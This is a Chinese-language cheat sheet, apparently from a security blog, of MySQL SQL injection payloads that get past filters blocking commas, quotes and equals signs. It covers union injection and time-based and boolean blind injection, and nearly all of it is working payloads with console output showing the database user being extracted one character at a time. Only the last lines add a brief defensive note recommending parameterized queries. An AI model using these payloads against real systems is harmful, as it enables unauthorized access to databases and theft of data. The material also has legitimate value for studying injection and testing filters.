0x01 逗号被过滤
1)联合注入
union select * from(select 1)a join (select 2)b
mysql> select * from admin where id=-1 union select * from(select 1)a join (select 2)b;
+----+-----+
| id | pwd |
+----+-----+
| 1 | 2 |
+----+-----+
1 row in set (0.00 sec)
mysql> select * from admin where id=-1 union select * from(select user())a join (select 2)b;
+----------------+-----+
| id | pwd |
+----------------+-----+
| root@localhost | 2 |
+----------------+-----+
1 row in set (0.00 sec)
2)盲注
case when...then...else...end + from...for...
case when(substring(user() from 1 for 1)='r') then sleep(3) else 0 end
mysql> select * from admin where id=1 and case when(substring(user() from 1 for 1)='r') then sleep(3) else 0 end;
Empty set (3.00 sec)
mysql> select * from admin where id=1 and case when(substring(user() from 1 for 1)='o') then sleep(3) else 0 end;
Empty set (0.00 sec)
布尔盲注只要把 then sleep(3) else 0 改成 then 1 else 0 就好了
Payload 2
and (select 1 from(select substring((user()) from 1 for 1)='r' and sleep(3))x)
mysql> select * from admin where id=1 and (select 1 from(select substring((user()) from 1 for 1)='r' and sleep(3))x) ;
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (3.00 sec)
mysql> select * from admin where id=1 and (select 1 from(select substring((user()) from 1 for 1)='o' and sleep(3))x) ;
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
3)limit 中逗号被过滤
LIMIT 语法：limit 0,1 等价于 limit 1 offset 0
mysql> select pwd from admin limit 1 offset 0;
+-------+
| pwd |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)
mysql> select pwd from admin limit 1 offset 1;
+------+
| pwd |
+------+
| test |
+------+
1 row in set (0.00 sec)
like
mysql> select * from admin where id=1 and if(mid(user(),1,1) like 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and if(mid(user(),1,1) like 'a',1,0);
Empty set (0.00 sec)
regexp
mysql> select * from admin where id=1 and if(mid(user(),1,1) regexp 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and if(mid(user(),1,1) regexp 'a',1,0);
Empty set (0.00 sec)
between ... and ...
mysql> select * from admin where id=1 and if(mid(user(),1,1) between 'r' and 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and if(mid(user(),1,1) between 'r' and 'a',1,0);
Empty set (0.00 sec)
rlike
mysql> select * from admin where id=1 and if(mid(user(),1,1) rlike 'r',1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and if(mid(user(),1,1) rlike 'a',1,0);
Empty set (0.00 sec)
locate
mysql> select * from admin where id=1 and if(locate('r',substr(user(),1,1))>0,1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and if(locate('a',substr(user(),1,1))>0,1,0);
Empty set (0.00 sec)
position
mysql> select * from admin where id=1 and if(position('root' in substr(user(),1,4))>0,1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and if(position('xxxx' in substr(user(),1,4))>0,1,0);
Empty set (0.00 sec)
instr
mysql> select * from admin where id=1 and if(instr(substr(user(),1,4),'root')>0,1,0);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and if(instr(substr(user(),1,4),'xxxx')>0,1,0);
Empty set (0.00 sec)
ascii
and if(ascii(substr(user(),1,1))=114,sleep(3),1)
mysql> select * from admin where id=1 and if(ascii(substr(user(),1,1))=114,sleep(3),1);
Empty set (3.00 sec)
mysql> select * from admin where id=1 and if(ascii(substr(user(),1,1))=115,sleep(3),1);
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
无逗号、无单双引号
and case when(ascii(substring(user() from 1 for 1))=114) then 1 else 0 end
mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1))=114) then 1 else 0 end;
+----+-------+
| id | pwd |
+----+-------+
| 1 | admin |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1))=115) then 1 else 0 end;
Empty set (0.00 sec)
无逗号、无单双引号、无等号
and case when(ascii(substring(user() from 1 for 1)) like 114) then sleep(3) else 0 end
mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1)) like 114) then sleep(3) else 0 end;
Empty set (3.00 sec)
mysql> select * from admin where id=1 and case when(ascii(substring(user() from 1 for 1)) like 115) then sleep(3) else 0 end;
Empty set (0.00 sec)
更多有趣的组合等着你自己去发现了。从防御角度看，上面这些例子说明仅靠过滤逗号之类字符的黑名单并不可靠，根本的解决方案仍然是参数化查询。绝大部分的内容都来自下方参考链接，该师傅写得非常好，有兴趣的可以去围观围观吧。如有侵权，请联系删除。
参考:https://xz.aliyun.com/t/5505